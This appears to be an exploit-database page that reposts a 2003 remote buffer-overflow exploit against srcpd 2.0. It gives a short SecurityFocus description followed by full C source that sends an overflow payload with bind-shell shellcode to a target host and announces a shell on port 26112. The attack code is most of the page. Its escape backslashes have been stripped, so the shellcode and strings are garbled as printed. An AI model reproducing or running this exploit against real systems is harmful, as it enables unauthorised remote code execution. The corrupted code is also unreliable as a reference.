Srcpd 2.0 – Multiple Buffer Overflow Vulnerabilities
漏洞ID | 1054113 | 漏洞类型 | |
发布时间 | 2003-08-21 | 更新时间 | 2003-08-21 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/8467/info
Several stack-based buffer overflow vulnerabilities exist in multiple srcpd commands that may allow an attacker to run arbitrary code on a vulnerable host. The vulnerability is due to the lack of boundary checking in the affected functions, leading to stack overflow conditions.
An attacker may succesfully exploit this issue in order to gain access to a vulnerable system.
/*
* m00 Security
* www.m00security.org
* srcpd =< 2.0 remote exploit
*
* Audited by h0snp && Over_G.
* Programmed by h0snp.
* 2003.
* ----------
* Contact: #m00 at irc.wom.ru
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <getopt.h>
#define SCODELEN 148
#define NOP 0x90
#define RET 0xbf1fcb61
unsigned long int resolve(char *host)
{
long i;
struct hostent *he;
i = inet_addr(host);
if (i < 0)
{
he = gethostbyname(host);
if (!he) return (0);
else return (*(unsigned long *)he->h_addr);
}
return (i);
}
int make_connect(char *address, unsigned short port)
{
int sock,i;
struct sockaddr_in peer;
sock = socket(AF_INET,SOCK_STREAM,0);
if (sock <= 0) return -1;
if (!(i = resolve(address))) return -2;
else
{
peer.sin_family = AF_INET;
peer.sin_addr.s_addr = i;
peer.sin_port = htons(port);
}
if (!(connect(sock,(struct sockaddr *)&peer,sizeof peer))) return (sock);
else { close(sock); return -3; }
}
unsigned char scode[]=
"x31xc0x31xdbx31xc9x31xd2xb0x66xb3x1x51xb1x6x51xb1x1"
"x51xb1x2x51x8dxcx24xcdx80xb3x2xb1x2x31xc9x51x51x51x80"
"xc1x66x66x51xb1x2x66x51x8dxcx24xb2x10x52x51x50x8dxcx24"
"x89xc2x31xc0xb0x66xcdx80xb3x1x53x52x8dxcx24x31xc0xb0x66"
"x80xc3x3xcdx80x31xc0x50x50x52x8dxcx24xb3x5xb0x66xcdx80"
"x89xc3x31xc9x31xc0xb0x3fxcdx80x41x31xc0xb0x3fxcdx80x31"
"xdbx53x68x6ex2fx73x68x68x2fx2fx62x69x89xe3x8dx54x24x8"
"x31xc9x51x53x8dxcx24x31xc0xb0xbxcdx80x31xc0xb0x01xcdx80";
long get_esp(){ __asm__ ("movl %esp,%eax"); }
struct
{
char* type;
long ret;
unsigned int rep;
} targets[]=
{
{"Red Hat Linux 9.0 x86 srcpd 2.0 (build gcc 3.2.2)",RET,13},
{"Red Hat Linux 9.0 x86 srcpd 2.0 (from rpm)",0xbf1fcba1,6},
{"Red Hat Linux 7.3 x86 srcpd 2.0 (from rpm)",0x42931b51,6},
}, dumb;
void usage(char* name)
{
int i;
printf("rSrcpd v2.0 remote exploit by m00 Securityn");
printf("usage: %s -h <host> -p <port> -t <target> [-o <offset>] n",name);
printf("avialable targets:n");
for (i =0; i< sizeof(targets)/sizeof(dumb); i++)
printf(" %3d / 0x%.8x / %s n",i,targets[i].ret,targets[i].type);
exit(0);
}
int main(int argc, char* argv[])
{
char* host,*buf,*rcvbuf;
long ret = RET/*get_esp()*/,*addr;
int rez,port=12340,sock,pos,i,trgt;
if (argc < 4) usage(argv[0]);
while ((rez = getopt(argc,argv,"h:p:o:t:")) != -1)
switch (rez)
{
case 'h': host = optarg; break;
case 'p': port = atoi(optarg); break;
case 'o': ret -= atol(optarg); break;
case 't': trgt = atoi(optarg); break;
case '?': break;
}
printf(" ** ***************************************** **n");
printf(" ** Srcpd v2.0 remote exploit by m00 Security **n");
printf(" ** ***************************************** **n");
printf(" Conneting...");
if ((sock = make_connect(host,port)) <= 0)
{
perror(" connect()");
exit(-1);
}
ret = targets[trgt].ret;
printf("OKn using RET = 0x%xn",ret);
buf = (char*)malloc(220);
rcvbuf = (char*)malloc(512);
pos = recv(sock,rcvbuf,512,0);
printf(" Sending...");
if (pos <= 0 || pos == EOF) return -1;
send(sock,"go 11111rn",10,0);
pos = recv(sock,rcvbuf,512,0);
if (pos <= 0 || pos == EOF) return -1;
memset(buf,NOP,200);
memcpy(buf,"set 1 lock ",11);
addr = (long*)(buf+11);
for (i =0; i< targets[trgt].rep; i++)
*(addr++) = ret;
*(addr++) = 'x20';
memcpy(buf+targets[trgt].rep*4+12,scode,SCODELEN);
buf[219] = ' ';
printf("OKn");
send(sock,buf,220,0);
printf(" now, if you was lucky with ret, shell spawned on 26112.n");
free(buf);
free(rcvbuf);
close(sock);
return 0;
}
相关推荐: ParaChat Phantom User Denial Of Service Vulnerability
ParaChat Phantom User Denial Of Service Vulnerability 漏洞ID 1101745 漏洞类型 Failure to Handle Exceptional Conditions 发布时间 2002-07-31 更…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666